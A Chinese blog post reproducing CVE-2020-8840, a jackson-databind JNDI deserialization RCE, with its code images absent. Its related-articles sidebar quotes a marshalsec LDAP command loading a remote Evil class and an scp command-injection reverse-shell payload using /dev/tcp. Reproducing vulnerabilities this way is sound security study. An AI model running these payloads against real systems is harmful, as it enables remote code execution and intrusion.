CVE-2020-8840复现

最新推荐文章于 2023-12-27 19:05:05 发布
最新推荐文章于 2023-12-27 19:05:05 发布
阅读量2.9k 收藏 1
点赞数 1
分类专栏: 安全 环境复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39811856/article/details/107068913
版权

 

0x00 漏洞概述

FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。

此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。

0x01 环境搭建

搭建一个web服务器,我们采用python3

 

在web服务器目录放上已经编译好的恶意类

 

恶意文件内容为:

 

启动ldap服务 这边使用的是marshalsec:

 

建立一个java项目,导入存在漏洞版本的jar包

 

0x02 漏洞复现

执行POC:

 

弹出计算器:

 

再看看我们的服务器:

 

ATOM_123
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
FasterXML/jackson-databind 远程代码执行漏洞(CVE-2020-8840复现
锋刃科技的博客
12-12 6288
漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。 影响版本 2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2 环境搭建 项目地址: h...
CVE-2020-8840复现(xbean-reflect利用链)
ETO发展中心
12-18 1746
CVE-2020-8840复现(xbean-reflect利用链)搭建环境漏洞演示遇到的问题 搭建环境 下载marshalsec并编译,启动jndi环境 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer https://www.youi.xin/#Evil 编写Evil.java,内容如下: public class Evil { public Evil(){ try{
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
CVE-2020-8840 FasterXML / jackson-databind远程代码执行漏洞
cve-2020-8840.zip
05-03
CVE-2020-8840漏洞测试,简单的漏洞演示,以LDAP服务收到调用请求为准,实际调用类并未编写。
FasterXML Jackson-databind远程代码执行漏洞 CVE-2020-8840 已亲自复现 未完成
最新发布
qq_42430287的博客
12-27 1384
受影响版本的jackson-databind中缺少某些xbean-reflect/JNDI黑名单类,如org.apache.xbean.propertyeditor.JndiConverter,导致攻击者可通过JNDI注入的方式对此漏洞进行利用,成功时可以实现远程代码执行。2.0.0
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163 CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-7245(CTFd账户接管漏洞)复现
微风飘呀飘
07-03 1782
0x01 漏洞描述 在CTFd v2.0.0-v2.2.2的注册过程中,错误的用户名验证方式会允许攻击者接管任意帐户,前提是用户名已知并且在CTFd平台上启用了电子邮件功能。 0x02 漏洞分析 CTFd v2.0.0版本注册部分的代码 CTFd/CTFd/auth.py#159 CTFd/CTFd/auth.py#207 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
复现 CVE-2020-0796
m0_46580995的博客
08-01 225
CVE-2020-0796远程代码执行复现 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit S
CVE-2020-8840:Jackson-databind RCE
Fly_鹏程万里
07-11 2435
影响范围 jackson-databind before 2.9.10.3 jackson-databind before2.8.11.5 jackson-databind before2.7.9.7 漏洞类型 JDNI注入导致RCE 利用条件 开启enableDefaultTyping() 使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖 漏洞概述 2020年2月,jackson-databind在github上更新了一个新的反..
cve-2020-11652漏洞复现
weixin_44664530的博客
05-08 1481
介绍: Saltstack是基于python开发的一套C/S架构自动化运维工具,通过Saltstack运维人员可以实现在众多服务器上批量执行命令,提高运维效率,因而受到一些云主机商、私有云公司的青睐。然而,近日SaltStack被爆存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。其中,通过认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master...
CVE-2020-7471漏洞复现
qq_39682037的博客
03-29 2615
简介 2020年2月3日,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 漏洞影响 受影响版本: Django 1.11.x < 1.11.2...
CVE-2020-24616复现
mukami0621的博客
09-07 2764
CVE-2020-24616复现 预警参考链接:https://s.tencent.com/research/bsafe/1102.html 8月底爆出的新漏洞,分析可参考:https://mp.weixin.qq.com/s/IICSnsSgwsjnbImgVP-y5g 参考CVE-2020-8840复现流程,编写Poc,实现此漏洞复现 1、搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 2、可以直接本地充当服务端,也可使用另一台在同一局域网下的电脑充当服务端,两种方式经实验皆可成功复现
CVE-2020-15778漏洞复现
热门推荐
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
Apache Ghostcat(CVE-2020-1938) 漏洞复现
suiyideAli的博客
03-09 1243
0x00 漏洞详情 2月14日,Apache Tomcat 官方发布安全更新版本,修复漏洞。2月20日,国家信息安全漏洞共享平台(CNVD)发布安全公告,该漏洞综合评级为高危,漏洞 CVE 编号 CVE-2020-1938。 长亭科技安全研究人员将此漏洞命名为“幽灵猫(Ghostcat)”。 【漏洞危害】 通过 Ghostcat漏洞,攻击者可以读取 Tomcat下部署的所有webapp目录下的...
jackson-databind远程代码执行漏洞(CVE-2020-8840)修复与测试
Quarrie的博客
05-03 3882
漏洞介绍 攻击者可以利用此漏洞通过JNDI注入的方式执行本地Web容器下的任意代码,后文中将测试LDAP方式的远程代码调用,受影响版参见:NVD。 修复建议 网上能找到的大部分修复建议是将jackson-databind的版本升级到2.9.10.4或后续版本,此方法的确行之有效,但是对于使用JDK1.6的老项目就比较尴尬,因为至2.8版本后jackson-databind字节码不再兼容JDK1.6...
CVE-2020-8840 poc
09-08
根据引用提到的CVE-2020-8840漏洞复现,以及引用中提到的jackson-databind更新的反序列化利用类org.apache.xbean.propertyeditor.JndiConverter,可以得知该漏洞可以绕过黑名单类,并且在较低的JDK版本下可导致远程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值